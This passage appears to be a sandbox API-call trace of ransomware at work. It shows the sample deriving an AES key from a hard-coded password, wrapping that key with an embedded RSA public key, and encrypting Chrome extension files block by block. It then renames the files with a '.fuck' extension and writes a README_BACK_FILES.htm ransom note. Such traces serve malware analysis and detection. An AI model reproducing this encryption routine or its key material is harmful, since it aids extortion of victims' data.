pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.715] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.715] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e74f78) returned 1 [0263.716] CryptImportPublicKeyInfo (in: hCryptProv=0x2e74f78, dwCertEncodingType=0x1, pInfo=0x2eaebb0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaebe0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaebe8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e280) returned 1 [0263.716] CryptEncrypt (in: hKey=0x2e7e280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.716] CryptEncrypt (in: hKey=0x2e7e280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e74e68*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e74e68*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.716] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e74e68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e74e68*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.717] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.719] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.719] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.728] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.729] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.729] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.729] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.729] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.729] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.729] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.729] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.729] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.729] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.729] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.729] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.729] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.729] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.730] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.730] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.730] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.730] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.730] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.730] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.730] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.730] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.730] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.730] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.730] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.730] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.730] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.730] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.730] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.730] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.730] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.730] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.730] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.731] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.731] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.731] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.731] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.731] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.731] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.731] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.731] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.731] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.731] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.731] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.731] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.732] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.732] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.732] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.732] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.732] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.732] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.732] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x45, lpOverlapped=0x0) returned 1 [0263.732] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x45, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x50) returned 1 [0263.732] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x50, lpOverlapped=0x0) returned 1 [0263.732] CloseHandle (hObject=0x5d60) returned 1 [0263.732] CloseHandle (hObject=0x5d5c) returned 1 [0263.732] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json"), bFailIfExists=0) returned 1 [0263.735] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json", dwFileAttributes=0x0) returned 1 [0263.735] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.gsg")) returned 1 [0263.736] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.fuck")) returned 1 [0263.737] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0263.737] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0263.737] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.737] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.737] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0263.738] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\readme_back_files.htm")) returned 0xffffffff [0263.738] AreFileApisANSI () returned 1 [0263.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.738] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.739] GetFileType (hFile=0x5d64) returned 0x1 [0263.739] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.740] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.740] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0263.740] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.740] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.740] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.740] GetLastError () returned 0x0 [0263.740] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json")) returned 0x20 [0263.741] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json", dwFileAttributes=0x80) returned 1 [0263.741] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.742] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.743] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.743] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.745] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.745] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0263.745] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.745] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0263.745] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.745] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.745] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e74b38) returned 1 [0263.746] 